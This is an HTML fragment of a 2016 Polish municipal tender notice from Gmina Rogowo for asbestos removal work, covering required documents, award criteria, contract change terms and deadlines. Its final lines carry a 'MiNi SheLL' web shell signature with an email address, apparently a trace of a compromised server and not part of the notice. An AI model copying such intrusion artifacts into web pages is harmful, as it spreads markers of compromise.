<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty nie wymienione w ust. 1-9 niniejszego rozdziału SIWZ:
a)wypełniony i podpisany przez Wykonawcę formularz oferty Załącznik nr 1  
do SIWZ;
b)wypełniony i podpisany przez Wykonawcę harmonogram rzeczowo-finansowy- załącznik nr 1 do projektu umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - TERMIN WYKONANIA - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć w chwili zawarcia umowy, Zamawiający odstąpi od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
2.Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)zmiany osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; 
2)zmiany terminu zakończenia realizacji inwestycji:
a)z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,
3)zmiany obowiązującej stawki podatku VAT:
a)zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części jakiej dotyczą      te zmiany przepisów.
4)zmiany sposobu wykonania usługi na skutek zmiany ilości wyrobów zawierających azbest przeznaczonych do demontażu, transportu i unieszkodliwienia lub tylko do zabrania z nieruchomości zmagazynowanych wyrobów zawierających azbest, transport i unieszkodliwienie.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rogowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo ul. Kościelna 8 , 88-420 Rogowo k/Żnina..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2016 godzina 11:00, miejsce: Urząd Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com